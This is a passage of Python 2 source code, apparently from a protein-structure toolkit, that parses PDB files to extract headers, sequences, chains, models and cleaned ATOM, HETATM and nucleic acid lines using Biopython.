elif isinstance( sequence , list ):
# yay, do it all over again :(
# make recursive
# assume all members are the same type...else its an error anyway
if isinstance( sequence[0] , str ):
for i in xrange( len( sequence ) ):
sequence[i] = SeqRecord( Seq( sequence[i] , alphabet ) )
sequence[i].id = seqid + '_' + str( unknown )
sequence[i].description = description
unknown += 1
elif isinstance( sequence[0] , Seq ):
for i in xrange( len( sequence ) ):
sequence[i] = SeqRecord( i )
sequence[i].id = seqid + '_' + str( unknown )
sequence[i].description = description
unknown += 1
# now that all are Biopython SeqRecords, write to file!
if not out_filename:
if type( sequence ) == list:
out_filename = sequence[0].id + '.' + seq_format_map[seq_format]
else:
out_filename = sequence.id + '.' + seq_format_map[seq_format]
SeqIO.write( sequence , out_filename , seq_format )
print 'Successfully wrote the sequence(s) to ' + os.path.relpath( out_filename )
return out_filename
################################################################################
# FULL RAW PROCESSING
# 1R69 - single model, single chain
# 1A17 - another random choice for testing
# 1BUW
# 1C17
# 1JYX
# 1M2V
# 1TF6
# 2C35
# 3G3O
# 1YY8 - AB and CD, single model
# 1NMR - multiple models
# 1LR1 - multiple models AND chains
# 1VTL - protein and DNA, single model
# 1UN6 - protein and RNA, single model
# the big boy...
def process_pdb( pdb_filename , seqformat = SEQFORMAT , seqformat_extension_map = SEQFORMAT_EXTENSION_MAP , conversion = three2three , na_conversion = NA_CONVERSIONS_ROSETTA , na_alphabet = DNAAlphabet , protein_alphabet = ProteinAlphabet ):
"""
Create a directory from <pdb_filename> containing relevant information
stored in the PDB file
This method behaves slightly differently for PDB files with multiple models,
nucleic acids, duplicate complexes, etc.
so if you are interested in the specifics, please read the source code
In short, it tries to write:
header.txt a text file of the header lines
numbering_map.txt a text file showing 1-indexed PDB numbering
clean.pdb only ATOM lines
hetatm.pdb only HETATM lines, may be split by resName
.fa sequences of all peptides and nucleic acids
subdirectories for each protein model/subunit (similar info)
does not write a text file for the "trailer" (lines after the coordinates)
converts lines (ATOM or HETATM) that can be converted based on <conversion>
(generally) and <na_conversion> (specific for nucleic acids, relevant
because RNA and DNA may require different treatment...)
!!!WARNING!!! defaults:
CSE CYS converts SelenoCysteinE to Cysteine
HYP PRO converts HYdroxylProline to Proline
CYD CYS does NOT convert "CYsteine Disulfides to Cysteine"
HIP HIS converts "HIP" to Histidine (~double protonation)
HID HIS converts "HID" to Histidine (~single delta N proton)
HIE HIS converts "HIE" to Histidine (~single epsilon N proton)
todo:
ensure hetatm conversions step illegal atoms!!!!
alternate conformations
convert DNA to Rosetta DNA
convert ligands to params
convert water to TP3 (or TP5)
"""
# process input, optionally a list
if isinstance( pdb_filename , list ):
print 'Multiple PDB codes detected, processing them individually...'
# use this list comprehension, get them all!
filenames = [process_pdb( i , seqformat , seqformat_extension_map , conversion , na_conversion , na_alphabet , protein_alphabet ) for i in pdb_filename]
print 'Finished the whole list, enjoy!'
return filenames
####################
# NEW DIRECTORY ETC.
# get root name
pdb_filename = os.path.abspath( pdb_filename )
root_name = get_root_filename( pdb_filename )
best_guess = pdb_filename
# make a new directory, a whole lot is gonna go here...
create_directory( root_name , ' to sort the data' )
# move the pdb here
copy_file( pdb_filename , root_name )
# oh, and go there too
original_dir = os.getcwd()
os.chdir( root_name )
# "update" the target
pdb_filename = root_name + '/' + os.path.split( pdb_filename )[-1]
root_name = get_root_filename( pdb_filename )
##############
# PRE CLEANING
# does not need to know if nucleics or not
# convertions!
# ...bad...overwrite the file!...but no filename management
convert_pdb_resnames_to_ATOM_lines( pdb_filename , pdb_filename , root_name +'_conversion_report.txt' , conversion )
# produce a PDB with just the protein lines
best_guess = clean_ATOM_lines_from_pdb( pdb_filename )
# extract numbering
# don't bother storing the map
extract_numbering_map_from_pdb( pdb_filename , 'numbering_map.txt' )
# extract HETATM lines
clean_HETATM_lines_from_pdb( pdb_filename )
# write out alternate conformations for the cleaned file
alternate_conformations = clean_alternate_conformations_from_pdb( best_guess )
##########################
# HEADER PARSING
# extract info from header
# this information is accessible from the PDBParser header...sorta...
# get the number of models
models = extract_number_of_models_from_pdb_header( pdb_filename )
# get the subunit complexes
complexes = extract_duplicate_chains_from_pdb_header( pdb_filename )
# write the header (?)
# get the header
header = extract_header_from_pdb( pdb_filename )
###################
# HUNT DOWN HETATMS
# use the map in the header and extracted chemical formulas to search pubchem
# get map
# per hetatm type
# get formula
# get number of residues -> needed to interpret formula...
# search pubchem, download best sdf if exact match and at least < atoms
# create directory for these params etc.
##########################
# ASSESS NUCLEIC SITUATION
# HERE!
# choose your fate!, removes nucleic lines
has_nucleic = clean_nucleic_acid_lines_from_pdb( pdb_filename )
# get proteins if nucleics
if has_nucleic:
# get a PDB of protein only, use this from now on
print 'Scanners indicate there are nucleic acid lines in ' + os.path.relpath( pdb_filename ) + '\nSadly, a lot of toys do not play well with these so a few extra steps are required...'
# write nucleic sequences
temp , nucleic_types = extract_nucleic_acid_sequences_from_pdb( root_name + '.nucleic.pdb' , seqformat = seqformat , alphabet = na_alphabet , seqformat_extension_map = seqformat_extension_map )
# care not for the sequences
# make a Rosetta ready nucleic PDB!!!
# SO BAD! overwrite!
# BAH!!!
na_chains = split_pdb_into_chains( root_name + '.nucleic.pdb' , 0 , True ) # just 0 model...
for i in na_chains.keys():
# BETTER BE IN BOTH!!!
convert_pdb_resnames_to_ATOM_lines( na_chains[i] , na_chains[i] , 'nucleic_chain_'+ i +'_conversion_report.txt' , na_conversion[nucleic_types[i]] )
# check for protein :)
has_protein = clean_protein_lines_from_pdb( pdb_filename )
if not has_protein:
print 'The additional features are only available for proteins\nScanner indicate that this PDB has ONLY nucleic acids (no proteins) :(\nthe remaining methods rely on the Biopython PDBParser...and things get messy with nucleic acids\nEven so, the only feature you\' missing out on is splitting into subdirectories for each chain, and since the PDB is just nucleic acid, that isn\'t as helpful'
# premature exit
os.chdir( original_dir )
return best_guess
# change the name of the best guess to .protein.pdb
best_guess = root_name + '.protein.pdb'
pdb_filename = root_name + '.protein.pdb'
# get the nucleic chains
nucleic_chains = extract_chains_from_pdb( root_name + '.nucleic.pdb' )
############
# PDB PARSER
# does NOT loop over ANY nucleic acid chains!
# prepare to load...
parser = PDBParser( PERMISSIVE = 1 )
writer = PDBIO()
struct = parser.get_structure( root_name , pdb_filename )
# verify models and chains
temp = len( struct.child_list ) # number of models
if not temp == models:
print 'Huh? the PDB file header claims there are ' + str( models ) + ' models but the PDB file has ' + str( temp ) + ' models...\nUsing the ACTUAL number of models (' + str( temp ) + ')'
models = temp
# check from reading the CHAIN
if not complexes:
print 'No chain/subunit information found in the header (or no header),\nassuming all individual sequences are unique i.e. if AB and copy CD, will make A, B, C, and D instead of AB and CD'
# complexes = temp # unecessary, automatically happens below...
# add all new ids
temp = struct[0].child_dict.keys() # it better have at least 1 model...
# for the nucleic case...
if has_nucleic:
# HERE!
# remove nucleic lines...
for i in xrange( len( complexes ) ):
for j in nucleic_chains:
if j in complexes[i]:
complexes[i] = complexes[i].replace( j ,'' )
# sanity check...
complexes = [i for i in complexes if i]
# assume all models contain all chains...idk how this would ever NOT occur...
# this also produces a directory for EACH chain as the default behavior!!!
complexes += [i for i in temp if i and not i in complexes and not i in nucleic_chains]
else:
# normal protein stuff
complexes += [i for i in temp if i and not i in complexes]
# okay...this should be figured out...but isn't that big of a deal
# found with 1JGO
# print complexes
# print complexes
# complexes = [i for i in complexes if i]
# input('dd')
################################
# CREATE AND FILL SUBDIRECTORIES
# again, this step is skipped for pure nucleic acid...
# exit condition, only 1 model and 1 chain
if models > 1 or len( complexes ) > 1:
# over the models
for model in struct.child_dict.keys():
# over the chains
for complx in complexes:
# print '='*60 + complx
# remove nucleic subunits
# HERE!
if has_nucleic:
for chain in nucleic_chains:
complx = complx.replace( chain , '' ) # delete the chain from the complex
# check that all members are present
chains = struct[model].child_dict.keys()
missing = [l for l in complx if not l in chains]
# report this!
if missing:
# add models bool for str here?
print 'Expected model ' + str( model + 1 ) + ' to have chains ' + complx + ' but the its missing chains ' + ', '.join( missing ) + '!'
# create the new directory
# only number if more than 1 model
dir_name = complx + str( model + 1 )*bool( models - 1 )
new_dir = os.path.split( root_name )[0] + '/' + dir_name
print 'Creating the subdirectory ' + os.path.relpath( new_dir )
os.mkdir( new_dir )
# create a copy of the complex, only the chains of interest
# make an empty structure
temp = Structure( 'temp' )
temp_model = Model( model ) # and an empty model
temp.add( temp_model )
# add the complex
for chain in complx:
temp[model].add( struct[model][chain] )
# get the chain sequence
seqid = dir_name + ('_model_' + str( model + 1 ))*bool( models - 1 ) + '_chain_' + chain
seq_filename = new_dir + '/' + os.path.split( root_name )[-1] + ('_model_' + str( model + 1 ))*bool( models - 1 ) + '_chain_' + chain + '.' + seqformat_extension_map[seqformat]
description = '(from model ' + str( model + 1 ) + ')'
temp_seq = extract_protein_sequence_from_pdb( temp , True , # MUST insert disorder...
seq_filename , seqid , description , model , chain ,
True , seqformat , protein_alphabet , seqformat_extension_map )
# also, make sure at least one copy (from the first model) is in the main dir
seq_filename = root_name + '_chain_' + chain + '.' + seqformat_extension_map[seqformat]
if not os.path.exists( seq_filename ):
print 'Putting a copy of the sequence in the new directory'
# assumes all the models have the same sequence
write_sequence( temp_seq , seq_filename , seqformat ,
os.path.split( root_name )[-1] + ' chain ' + chain ,
description , protein_alphabet , seqformat_extension_map )
# write out the model+chain
writer.set_structure( temp )
print 'Writing a copy of model ' + str( model + 1 ) + ' chain(s) ' + complx + ' to ' + new_dir + '.pdb'
writer.save( new_dir + '/' + dir_name + '.pdb' )#, selection )
# also write a cleaned PDB file, onlt ATOM lines
clean_ATOM_lines_from_pdb( new_dir + '/' + dir_name + '.pdb' )
# also write any alternate conformations
clean_alternate_conformations_from_pdb( new_dir + '/' + dir_name + '.pdb' )
# also get specific HETATMs...this is getting bulky...
clean_HETATM_lines_from_pdb( new_dir + '/' + dir_name + '.pdb' )
# no need to clean DNA
else:
# only 1 model AND only 1 chain
# still write it please :)
model = 0
chain = complexes[0]
# may seem silly, but this edge case will prevent needless re-parsing
# get the chain sequence
seqid = os.path.split( root_name )[-1] + '_chain_' + complexes[0]
extract_protein_sequence_from_pdb( struct , True ,
seqid + '.' + seqformat_extension_map[seqformat] , seqid , '' ,
model , chain , True ,
seqformat = seqformat , alphabet = protein_alphabet , seqformat_extension_map = seqformat_extension_map )
# debug summary...
temp = os.listdir( os.getcwd() )
temp.sort()
print 'New Files in the ' + root_name + ' directory :\n' + '\n'.join( ['\t'+ i for i in temp] )
# return back one directoy
os.chdir( original_dir ) # yeah...its hacky
return best_guess
################################################################################
# HEADER STUFF
# extract header text
def extract_header_from_pdb( pdb_filename , header_filename = 'header.txt' ):
# write the header (?)
# get the header
f = open( pdb_filename , 'r' )
header = ''
while True: # should error from f.next() if improper input...
# next line
line = f.next()
# exit condition
if 'ATOM' == line[:4] or 'MODEL' == line[:5] or 'HETATM' == line[:6]:
break
header += line
f.close()
# write the header
if header_filename:
print 'Writing a copy of the header lines to the file ' + header_filename
f = open( header_filename , 'w' )
f.write( header )
f.close()
return header
# return any predicted shain pairs
def extract_duplicate_chains_from_pdb_header( pdb_filename ):
# load the raw data
f = open( pdb_filename , 'r' )
complexes = []
keep_going = True
while keep_going:
# next line
line = f.next()
# ...think about this...
# check if chain info, extract the matching subunits
if line[:6] == 'COMPND' and 'CHAIN:' in line:
duplicate = line.split( 'CHAIN: ' )[-1].replace( ';' , '' ).strip().split( ', ' ) # ignore ";\n"
if len( duplicate ) > 1:
complexes.append( duplicate )
# stop condition
elif not ('HEADER' in line or 'TITLE' in line or 'COMPND' in line or 'CAVEAT' in line):
keep_going = False
f.close()
# convert complexes
if complexes:
if not sum( [len( c ) - len( complexes[0] ) for c in complexes] ):
# all are the same length
complexes = [''.join( [c[i] for c in complexes] ) for i in xrange( len( complexes[0] ) )]
else:
# uh oh...
# could be all should be unique...which puts us in exception land anyway
# assume that last listed are aberrantly unpaired
lowest = min( [len( c ) for c in complexes] )
temp = [''.join( [c[i] for c in complexes] ) for i in xrange( lowest )]
for c in complexes:
temp += c[lowest:]
complexes = temp
return complexes
# return number of models, scanned from header
def extract_number_of_models_from_pdb_header( pdb_filename ):
# get the number of models
f = open( pdb_filename , 'r' )
models = 1
keep_going = True
while keep_going:
# next line
line = f.next()
# check for models
if line[:6] == 'NUMMDL':
models = int( line.replace( 'NUMMDL' , '' ).strip() )
keep_going = False
elif line[:4] == 'ATOM':
keep_going = False
f.close()
return models
# return resolution, scanned from header
# other information? R-value? R-free?
# other places to extract the quality...?
def extract_resolution_information_from_pdb_header( pdb_filename ):
# load it
f = open( pdb_filename , 'r' )
# ewww....should be a "for" loop that breaks...
keep_going = True
experimental_data = 'X-RAY DIFFRACTION'
resolution = None
while keep_going:
# next line
line = f.next()
# check for models
if line[:6] == 'EXPDTA':
# print 'found exp data'
experimental_data = line[6:].strip()
elif line[:10] == 'REMARK 2':
# check for NMR
# print 'found remark'
# print line
if 'ANGSTROMS' in line:
# print 'found resolution'
resolution = float( line[23:].strip().split( 'ANGSTROMS' )[0].strip() )
keep_going = False
elif line[:4] == 'ATOM':
keep_going = False
f.close()
return resolution , experimental_data
# return number of models, scanned from header
def extract_HETNAM_from_pdb_header( pdb_filename ):
# get the number of models
f = open( pdb_filename , 'r' )
hetname_map = {}
keep_going = True
while keep_going:
# next line
line = f.next()
# check for models
if line[:6] == 'HETNAM':
hetname = line[6:].strip().split( ' ' )
hetkey = hetname[0]
hetname = ''.join( [i + ' ' for i in hetname[1:]] )[:-1]
hetname_map[hetkey] = hetname
elif line[:4] == 'ATOM':
keep_going = False
f.close()
return hetname_map
################################################################################
# DIVIDE AND JOIN
# split or join PDB files
# simple wrapper
def morph_atomName2element( atomName ):
"""
Returns the element in <atomName>
raw PDB atomNames are supposed to have the element as the first character
"""
element = atomName[:2].strip()
# remove number characters
for i in '0123456789':
element = element.replace( i , '' )
return element
# make sure a filename, Structure, or Model returns the Model of interest
# not tested recently...
def load_pdb( pdb , model = 0 ):
"""
Returns the <model> of <pdb> if its a Structure object (or a filename)
"""
# sort the input
if isinstance( pdb , str ):
# filename
print 'Input filename ' + pdb + ', loading the structure now'
parser = PDBParser( PERMISSIVE = 1 )
pdb = parser.get_structure( 'temp' , pdb )
# default to first one if empty...
if not model:
model = pdb.child_dict.keys()[0]
print 'extracting the first model (' + str( model ) + ')'
pdb = pdb[model] # get the first model
# tried doing this a prettier way...
# check for specific methods and data types for clues...
elif isinstance( pdb.child_dict.keys()[0] , int ):
# its a Biopython structure
# default to first one if empty...
if not model:
model = pdb.child_dict.keys()[0]
print 'Input Biopython Structure, extracting the first model (' + str( model ) + ')'
pdb = pdb[model] # get the first model
elif 'child_dict' in dir( pdb ):
# ...could be any number of things...including what we want!
# hooray! everything is okay
None
else:
# not supported!
raise IOError( 'That data structure is not currently supported...' )
return pdb
# check the PDB for models and split into separate PDBs
def split_pdb_into_models( pdb_filename ):
"""
Writes a single PDB file for every model in <pdb_filename>
uses the Biopython PDBParser and PDBIO
"""
# make tools
parser = PDBParser( PERMISSIVE = 1 )
writer = PDBIO()
pdb_filename = os.path.abspath( pdb_filename )
root_name = get_root_filename( pdb_filename )
struct = parser.get_structure( root_name , pdb_filename )
# over the models
for i in struct.child_dict.keys():
# get just the model
temp = Structure( 'temp' )
temp.add( struct[i] )
# write it
writer.set_structure( temp )
out_filename = root_name + '_model_' + str( i + 1 ) + '.pdb'
print 'Model ' + str( i + 1 ) + ' written to ' + out_filename
writer.save( out_filename )
# check the PDB for chains and split into separate PDBs
def split_pdb_into_chains( pdb_filename , model = 0 , export = False ):
"""
Writes a single PDB file for every chain in <pdb_filename>
uses the Biopython PDBParser and PDBIO
"""
# make tools
parser = PDBParser( PERMISSIVE = 1 )
writer = PDBIO()
pdb_filename = os.path.abspath( pdb_filename )
root_name = get_root_filename( pdb_filename )
struct = parser.get_structure( root_name , pdb_filename )
# assume there is only 1 model
# over the chains
chains = {}
for i in struct[model].child_dict.keys():
# get just the model
temp = Structure( 'temp' )
temp_mod = Model( 0 )
temp_mod.add( struct[0][i] )
temp.add( temp_mod )
# write it
writer.set_structure( temp )
out_filename = root_name + '_chain_' + i + '.pdb'
# chains.append( 'Chain ' + i + ' written to ' + out_filename )
chains[i] = out_filename
writer.save( out_filename )
# debug output
for i in chains.keys():
print 'Chain ' + i + ' written to ' + chains[i]
# optionally export
if export:
return chains
# add all files together in the provided order
# not tested recently...
def join_pdb_files( files , out_filename = '' ):
"""
Combines the contents of all <files> and writes it out to <out_filename>
a very simple method
"""
# default filename
out_filename_provided = True
if not out_filename:
out_filename_provided = False
text = ''
for i in files:
# open it
f = open( i , 'r' )
# add the text
text += f.read()
f.close()
# check if the name should be added
if not out_filename_provided:
if '.' in i:
out_filename += i[:i.find( '.' )]
else:
out_filename += i
# write the bastard love child
f = open( out_filename , 'w' )
f.write( text )
f.close()
# extract the chains from the PDB
# only considers ATOM lines, mainly for use with clean_nucleic_acid_lines_from_pdb
def extract_chains_from_pdb( pdb_filename , only = ['ATOM'] ):
"""
Returns the chains found in <pdb_filename>
Only consider lines starting with <only>
"""
pdb_filename = os.path.abspath( pdb_filename )
if os.path.exists( pdb_filename ):
# load the data
f = open( pdb_filename , 'r' )
data = [i for i in f.xreadlines() if i[:6].strip() in only]
f.close()
# find unique chains
chains = []
for i in data:
if not i[21] in chains:
chains.append( i[21] )
return chains
else:
print 'No such file or directory named ' + os.path.relpath( pdb_filename )
return False
# extract the name mapping
def extract_numbering_map_from_pdb( pdb_filename , out_filename = '' , only = ['ATOM'] ):
"""
Returns a map (dict) from residues in <pdb_filename> that are 1-indexed
and a reverse map (dict)
Only consider lines starting with <only>
Optionally write the results to <out_filename>
"""
pdb_filename = os.path.abspath( pdb_filename )
if os.path.exists( pdb_filename ):
# load the raw data
f = open( pdb_filename , 'r' )
d = [i for i in f.xreadlines() if i[:6].strip() in only]
f.close()
# extract dict of pairs
pdb_map = {}
reverse_map = {}
count = 0
text = ''
for i in d:
# basic info
chain = i[21]
resseq = i[22:26].strip()
icode = i[26] # the icode
key = chain + resseq + icode
if not key in pdb_map.keys():
count += 1
pdb_map[key] = count
reverse_map[count] = key
text += key + '\t' + str( count ) + '\n'
# optionally write to file
# no defaulting!
if out_filename:
# default filename
# f = open( get_root_filename( pdb_filename ) + '_PDB_numbering.txt' , 'w' )
# f.write( ''.join( [i +'\t'+ str( pdb_map[i] ) +'\n' for i in pdb_map.keys()] ) )
print 'Writing the PDB numbering of ' + pdb_filename + ' to ' + out_filename
f = open( out_filename , 'w' )
f.write( text )
f.close()
return pdb_map , reverse_map
else:
print 'No such file or directory named ' + os.path.relpath( pdb_filename )
return False
# extract a protein sequence from a PDB
# make this better? specify the chain?
# for now, only works if single chain...
def extract_protein_sequence_from_pdb( pdb , include_breaks = True ,
out_filename = '' , seqid = '' , description = '' ,
model = 0 , chain = 'A' , export = True ,
seqformat = SEQFORMAT , alphabet = ProteinAlphabet ,
seqformat_extension_map = SEQFORMAT_EXTENSION_MAP ):
"""
Returns the protein sequences found in <pdb> in <model>
Optionally <export> the sequence
Optionally write to <out_filename> with <seqid>
note: does NOT scan for protein chains, it only dumps out the full
protein sequence in the PDB file
individual chains can be extracted using process_pdb
"""
# ensure pdb is proper, must be a model
pdb = load_pdb( pdb , model ) # necessary model?
# format the chain input
if not isinstance( chain , list ):
chain = [chain]
# over the desired chains
# ugh...this should all be rewritten...
sequences = []
for c in chain:
# get it
if include_breaks:
# extract the sequence as a Biopython Seq object
# convert the model into a Structure, for getting the sequence
for_seq = Structure( 'temp' )
# ...oh yeah...must be model 0 and up >:[
temp_model = Model( 0 ) # hardcoded...
for_seq.add( temp_model )
# for ch in pdb.child_dict.keys():
# copy it all over directly
for_seq[0].add( pdb[c] )
# gap regions makred as "|"
seq_builder = PPBuilder()
pp = seq_builder.build_peptides( for_seq )
seq = Seq( '|'.join( [str( frag.get_sequence() ) for frag in pp] ) , alphabet )
# for frag in pp:
# seq += frag.get_sequence() + '|' # already a Biopython Seq
seqr = SeqRecord( seq )
seqr.description = description + ' missing residues (gap regions as \"|\")'*( '|' in seq )
else:
# just iterate and extract!
seq = Seq( ''.join( [three2one[i.resname] for i in pdb.get_residues() if i.resname in three2one.keys() and i.get_parent().id == c] ) , alphabet )
seqr = SeqRecord( seq )
seqr.description = description
# prepare to write
# seq = seq[:-1]
# seqr.description = 'missing residues (gap regions as \"|\")'*( '|' in seq ) # no need if no gaps
seqr.id = seqid
sequences.append( seqr )
# optionally write the sequence
if out_filename:
write_sequence( sequences , out_filename , seqformat , alphabet , seqformat_extension_map )
# optionally export the sequence
if export:
return get_sequence( sequences )
# return str( seq )
# extract and write a file from the PDB
def extract_nucleic_acid_sequences_from_pdb( pdb_filename , out_filename = '' , NA = NUCLEIC_SEQUENCE_LETTERS_MAP , DNA = NA_CODES['DNA'] , seqformat = SEQFORMAT , alphabet = DNAAlphabet , seqformat_extension_map = SEQFORMAT_EXTENSION_MAP ):
"""
Returns the protein sequences found in <pdb_filename>
Only consider resNames in <NA>
Optionally write to <out_filename>
"""
pdb_filename = os.path.abspath( pdb_filename )
if os.path.exists( pdb_filename ):
# load the data
f = open( pdb_filename , 'r' )
d = f.readlines()
f.close()
# print about fails/assumptions
print 'Extracting nucleic sequences from ' + os.path.relpath( pdb_filename ) + '\nFor visibility, this method assumes A LOT!\n1. nucleotides are identified by a unique resSeq codes (with a proper resName)\n2. sequences are identified by unique chain IDs\n3. RNA is the default state\n4. DNA is identified by \"DG\" (etc.) OR \"T\" resi codes\n4. All sequences are continuous\n6. All sequences are recorded 5\' -> 3\' (and written to file in this order)'
# check for nucleic lines - No, do while parsing
# extract sequence
NA_keys = NA.keys()
DNA_keys = DNA.keys()
# molecule = 'RNA'
molecule_types = {}
sequences = {}
last = None
for line in d:
# must have C1 and a nucleic resi code to be considered a nucleotide
resname = line[17:20].strip()
resseq = line[22:27].strip() # resseq
if (line[:5] == 'ATOM ' or line[:4] == 'TER ') and resname in NA_keys:# and line[13:16].strip() == 'C1\'':
# only novel lines
if resseq == last:
continue
last = resseq # if the remainder will execute...
# check for DNA
chain = line[21]
if [True for i in DNA_keys if i in resname]:
# its DNA
molecule_types[chain] = 'DNA'
# consider the whole chain DNA if ANY of the exclusive codes are present
# sometimes DNA is abbreviated without the "d" to designate "deoxy"
# remember the letter
if chain in sequences.keys():
# add the letter
sequences[chain] += NA[resname] # map the code
else:
# create it as well
sequences[chain] = NA[resname]
molecule_types[chain] = 'RNA' # default
# default out name
root_filename = get_root_filename( pdb_filename )
if not out_filename:
out_filename = root_filename
# write the sequences
for chain in sequences.keys():
# verify its not just a nucleotide
seq = sequences[chain]
if len( seq ) > 1:
# determine the molecule type
# record a proprt id
seqr = SeqRecord( Seq( seq , alphabet ) ) # even if RNA (?)
seqr.id = os.path.split( root_filename )[-1] + '_chain_' + chain
seqr.description = molecule_types[chain]
# oh yeah, write it, prints out by itself
out_filename = seqr.id + '.' + seqformat_extension_map[seqformat]
write_sequence( seqr , out_filename , seqformat , alphabet , seqformat_extension_map )
return sequences , molecule_types # empty dict will evaluate as false
else:
print 'No such file or directory named ' + os.path.relpath( pdb_filename )
return False
################################################################################
# CLEANING METHODS
# HERE !!!
# a dirty input produces a cleaned output file :)
# default behavior is to produce output
# removes non ATOM lines from <pdb_file> and writes to <out_file>
def clean_ATOM_lines_from_pdb( pdb_filename , out_filename = '' , HETATM_include = [] , excluded_atoms = ['CN'] , accepted_fields = ['ATOM ' , 'TER '] ):
"""
Writes all lines in the PDB file <pdb_filename> beginning with "ATOM" or
"TER" into <out_filename> (defaults to <pdb_file>.clean.pdb)
Optionally include HETATM lines with resNames in <HETATM_include>
Returns True if successful
...pretty much the same as:
grep "ATOM" pdb_filename > out_filename
example:
clean_non_ATOM('1YY9.pdb')
See also:
Pose
Pose.dump_pdb
pose_from_pdb
pose_from_rcsb
"""
# get the file rootname
pdb_filename = os.path.abspath( pdb_filename )
root_filename = get_root_filename( pdb_filename )
if not root_filename: # in case it is improper, no "."
root_filename = pdb_filename
# an optional argument for PDB files not ending in .pdb
# if not edit:
# edit = 255
# if the file exists
if os.path.exists( pdb_filename ):
# find all ATOM and TER lines
f = open( pdb_filename , 'r' )
data = f.readlines()
f.close()
good = []
for i in data:
if [True for j in accepted_fields if i[:len( j )] == j]:
# if i[:5] == 'ATOM ' or i[:4] == 'TER ':
# add your preference rules for ligands, DNA, water, etc.
# check for excluded atoms
if i[12:16].strip() in excluded_atoms:
# skip it, do not add to the list
continue
good.append( i )
elif i[:6] == 'HETATM' and i[17:20] in HETATM_include:
# save for later, more processsing
good.append( i )
# stop condition
if not good:
# tell the user and exit
print 'No ATOM or HETATM lines in ' + os.path.relpath( pdb_filename )
return False
# default output file to <pdb_filename>.clean.pdb
if not out_filename:
out_filename = root_filename + '.clean.pdb'
# write the found lines
print 'if the file ' + os.path.relpath( out_filename ) + ' already exists, it will be overwritten!'
f = open( out_filename , 'w' )
f.writelines( good )
f.close()
print 'PDB file ' + os.path.relpath( pdb_filename ) + ' successfully cleaned, non-ATOM lines removed\nclean data written to ' + os.path.relpath( out_filename )
return out_filename
else:
print 'No such file or directory named ' + os.path.relpath( pdb_filename )
return False
# if you would prefer a simpler call using grep, it looks something like this
# os.system("grep \"ATOM\" %s.pdb > %s.clean.pdb"%(pdb_file[:edit],pdb_file[:edit]))
# split the ATOM lines, only look for DNA lines
def clean_nucleic_acid_lines_from_pdb( pdb_filename , out_filename = '' , NA = NUCLEIC_SEQUENCE_LETTERS_MAP.keys() ):
"""
Scan <pdb_filename> for any nucleic acid lines and writes these to
<out_filename>
defines nucleic acid resNames (three letter codes) as those with
stripped codes in <NA>
default definition of nucleic acid resNames can be adjusted in settings.py
"""
# get the file rootname
pdb_filename = os.path.abspath( pdb_filename )
root_filename = get_root_filename( pdb_filename )
if not root_filename: # in case it is improper, no "."
root_filename = pdb_filename
# if the file exists
if os.path.exists( pdb_filename ):
# find all ATOM and TER lines
f = open( pdb_filename , 'r' )
data = f.readlines()
f.close()
good = []
for i in data:
if (i[:5] == 'ATOM ' or i[:4] == 'TER ') and i[17:20].strip() in NA:
# add your preference rules for ligands, DNA, water, etc.
good.append( i )
# stop condition
if not good:
# tell the user and exit
print 'No nucleic acid lines in ' + os.path.relpath( pdb_filename )
return False
# default output file to <pdb_filename>.clean.pdb
if not out_filename:
out_filename = root_filename + '.nucleic.pdb'
# write the found lines
print 'if the file ' + os.path.relpath( out_filename ) + ' already exists, it will be overwritten!'
f = open( out_filename , 'w' )
f.writelines( good )
f.close()
print 'PDB file ' + os.path.relpath( pdb_filename ) + ' successfully cleaned, DNA/RNA lines extracted\nclean data written to ' + os.path.relpath( out_filename )
return out_filename
else:
print 'No such file or directory named '+ os.path.relpath( pdb_filename )
return False
# split the ATOM lines, only look for not RNA/DNA lines
def clean_protein_lines_from_pdb( pdb_filename , out_filename = '' , NA = NUCLEIC_SEQUENCE_LETTERS_MAP.keys() ):
"""
Scan <pdb_filename> for any nucleic acid lines and writes all "ATOM" lines
that are NOt nucleic acids to <out_filename>
defines nucleic acid resNames (three letter codes) as those with
stripped codes in <NA>
default definition of nucleic acid resNames can be adjusted in settings.py
"""
# get the file rootname
pdb_filename = os.path.abspath( pdb_filename )
root_filename = get_root_filename( pdb_filename )
if not root_filename: # in case it is improper, no "."
root_filename = pdb_filename
# if the file exists
if os.path.exists( pdb_filename ):
# find all ATOM and TER lines
f = open( pdb_filename , 'r' )
data = f.readlines()
f.close()
good = []
for i in data:
if (i[:5] == 'ATOM ' or i[:4] == 'TER ') and not i[17:20].strip() in NA:
# add your preference rules for ligands, DNA, water, etc.
good.append( i )
# stop condition
if not good:
# tell the user and exit
print 'No protein lines in ' + os.path.relpath( pdb_filename )
return False
# default output file to <pdb_filename>.clean.pdb
if not out_filename:
out_filename = root_filename + '.protein.pdb'
# write the found lines
print 'if the file ' + os.path.relpath( out_filename ) + ' already exists, it will be overwritten!'
f = open( out_filename , 'w' )
f.writelines( good )
f.close()
print 'PDB file ' + os.path.relpath( pdb_filename ) + ' successfully cleaned, protein lines extracted\nclean data written to ' + os.path.relpath( out_filename )
return True
else:
print 'No such file or directory named '+ os.path.relpath( pdb_filename )
return False
# scan for HETATMs, rewrite without all these lines, record specific ones
def clean_HETATM_lines_from_pdb( pdb_filename , out_filename = '' , only = '' , write_unique = True ):
"""
Writes all lines in the PDB file <pdb_filename> beginning with "HETATM"
into <out_filename> (defaults to <pdb_filename>.hetatm.pdb)
Optionally write PDB files for all unique residue type codes in the HETATM
lines if <write_unique> is True (default True)
OR
Writes all lines in the PDB file <pdb_filename> beginning with "HETATM"
AND with the resName <only>
Returns True if successful
"""
# get the file rootname
pdb_filename = os.path.abspath( pdb_filename )
root_filename = get_root_filename( pdb_filename )
if not root_filename: # in case it is improper, no "."
root_filename = pdb_filename
# if the file exists
if os.path.exists( pdb_filename ):
# find all HETATM
f = open( pdb_filename , 'r' )
data = f.readlines()
f.close()
good = []
unique = []
for i in data:
resn = i[17:20].strip()
if i[:6] == 'HETATM' and (not only or resn in only):
# save for later, more processsing
good.append( i )
# look for unique resn names
if not only and not resn in unique:
unique.append( resn )
# stop condition
if not good:
# tell the user and exit
print 'No HETATM lines in ' + os.path.relpath( pdb_filename )
return False
# default output file to <pdb_filename>.clean.pdb
if not out_filename:
if not only:
out_filename = root_filename + '.hetatm.pdb'
elif only in WATER_CONVERSION.keys(): # just waters...
out_filename = root_filename.replace( '.hetatm' , '' ) + '.waters.pdb'
else:
# its anything else, name based on the code
out_filename = root_filename.replace( '.hetatm' , '' ) + '.' + only + '.pdb'
# write the found lines
print 'if the file ' + os.path.relpath( out_filename ) + ' already exists, it will be overwritten!'
f = open( out_filename , 'w' )
f.writelines( good )
f.close()
# change this!
if not only:
